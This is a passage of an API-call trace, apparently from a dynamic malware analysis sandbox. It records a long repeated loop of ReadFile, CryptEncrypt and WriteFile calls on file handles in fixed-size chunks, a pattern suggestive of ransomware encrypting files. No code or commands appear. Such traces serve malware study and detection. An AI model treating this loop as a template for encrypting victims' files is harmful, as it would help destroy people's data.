lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.977] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.977] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.977] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.977] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.977] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.977] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.977] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.977] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.977] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.978] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.978] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.978] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.978] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.978] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.978] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.978] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.978] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.978] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.978] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.978] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.978] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.979] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.979] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.979] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.979] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.979] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.979] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.979] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.979] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.979] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.979] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.979] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.979] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.979] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.979] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.979] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.980] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.980] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.980] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.980] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.980] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.980] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.980] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.980] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.980] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.980] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.980] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.980] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.981] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.981] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.981] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.981] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.981] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.981] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.981] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.981] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.981] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.981] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.981] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.981] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.981] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.982] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.982] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.982] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.982] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.982] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.982] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.982] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.982] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.982] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.982] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.982] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.982] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.982] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.982] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.983] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.983] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.983] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.983] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.983] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.983] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.983] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.983] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.983] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.983] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.983] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.984] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.984] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.984] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.984] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.984] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.984] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.984] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.984] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.984] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.984] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.984] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.984] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.984] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.985] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.985] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.985] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 